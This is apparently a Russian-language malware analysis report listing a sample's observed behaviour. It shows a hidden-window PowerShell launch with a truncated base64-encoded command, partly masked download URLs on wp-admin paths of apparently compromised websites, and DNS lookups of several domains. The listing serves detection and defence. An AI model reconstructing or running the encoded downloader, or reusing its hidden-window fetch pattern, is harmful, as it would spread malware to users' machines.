Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAGgAegB1AHYAdgB6AGoAZQBpAD0AJwBCAGYAbQBoAGQAYgBxAGwAdgByAGkAYQAnADsAJABOAGgAegB4AHcAegBzAGwAIAA9AC...
- http://lo##nce.vn/wp-admin/BVqEVcyx/
- http://lo##nce.vn/expired
- http://th#####gthehumanity.com/wp-admin/zJfsDJE/
- DNS ASK lo##nce.vn
- DNS ASK th#####gthehumanity.com
- DNS ASK ch###tylov.com
- DNS ASK po######dcourieretc.co.uk
- DNS ASK ta####uermorgen.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAGgAegB1AHYAdgB6AGoAZQBpAD0AJwBCAGYAbQBoAGQAYgBxAGwAdgByAGkAYQAnADsAJABOAGgAegB4AHcAegBzAGwAIAA9AC...' (со скрытым окном)